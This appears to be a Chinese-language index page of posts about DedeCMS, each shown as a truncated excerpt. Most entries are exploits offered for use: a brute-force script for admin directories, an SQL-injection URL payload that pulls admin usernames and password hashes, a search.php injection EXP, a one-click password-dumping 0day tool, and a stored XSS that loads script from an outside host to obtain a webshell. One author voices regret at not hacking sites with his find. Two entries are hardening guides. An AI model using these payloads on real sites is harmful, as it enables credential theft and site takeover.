WIN服务器爆破DEDECMS后台目录

利用脚本python: #!/usr/bin/env python '''/* * author = Mochazz * team = 红日安全团队 * env = pyton3 * */ ''' import requests import itertools characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#" back_dir = ""...

- 阅读全文 -

DedeCMS 20140201 之前的5.7通杀

无需注册会员账号: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=' or mid=@`'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,...

- 阅读全文 -

[通杀]dedecms plus/search.php 注入漏洞利用EXP

哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。 既然已经发出来了,我就把我自己搞的exp发下吧。。唉。 我一般是这样测试的: 提交 http://webshell.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a   ...

- 阅读全文 -

DeDeCMS v5.7最新利用工具[一键暴密码]0day

使用说明: 1、输入被检测网站的地址 2、请等待,时间取决于你的网络状况,和网站的速度。 3、如果网站没有漏洞的话会弹出提示。 4、成功的话会弹出一个窗口复制密码去破解就好了。 下载地址:DeDeCMS

- 阅读全文 -

dedecms xss 通杀所有版本 dede 5.6 dede 5.7 直接获取webshell

DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)   目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个: 开启注册 开启投稿 注册会员-发表文章投稿,内容如下填写: <style>@im\port'\http://webshe...

- 阅读全文 -

DEDECMS安全设置指南

   DEDECMS 这名词细想起来,我还是有一份特殊的感情的,当初做网站的时候,最早用的动易CMS2006,后来转PHP后,一直用的DEDECMS,只是现今不在用了而已,可以说,它造就了很多中小站长,是中小站长的福音。 下面就DEDECMS的安全设置,简单记录下。 1、尽量使用纯PHP的主机空间,如果非要使用WINDOWS,最好关闭非所有PHP支持; 2、更改默认的 www.webshell.c...

- 阅读全文 -

dedecms通杀SQL注入

# Dede Cms All Versions Sql Vulnerability Exploit # </ No Priv8 , Everything is Public > # Date: 30/12/2011 - 13:00 # Author: [ CWH ] | Finded By : Nafsh # We Are : Mr.M4st3r , Nafsh , Skote_Vah...

- 阅读全文 -

dedecms 5.7 - 游客无限刷顶踩数值

只测试了DEDECMS V5.7系统,之前的版本估计也一样。 在官方地址进行的简单测试,应该算是一个小BUG,利用这个可以无限的刷某篇文章的顶/踩 数值。 详细说明:虽然前端页面做了 游客 只能提交一次的限制,但是直接以URL访问则没有限制,只要按着F5不放,一会就能上百上千。。。。 而且dede的官方也木有做这方面的限制。。。你懂的 漏洞证明:http://www.dedecms.com/plu...

- 阅读全文 -

dedecms程序六个安全措施

近期,有部分无聊人士喜欢利用0day 找到程序的漏洞上传流量攻击脚本,让人很头疼。目前发现的99%是dedecms程序漏洞,如果您正在使用dedecms程序,请看下面的几个步骤。 1.在dedecms的后台更新补丁,尽可能升级为最新版本。 2.data、templets、uploads、install这几个目录去掉写的权限 。 3.如果只是使用文章系统并没有使用会员功能,则强推推荐:关闭会员功能、...

- 阅读全文 -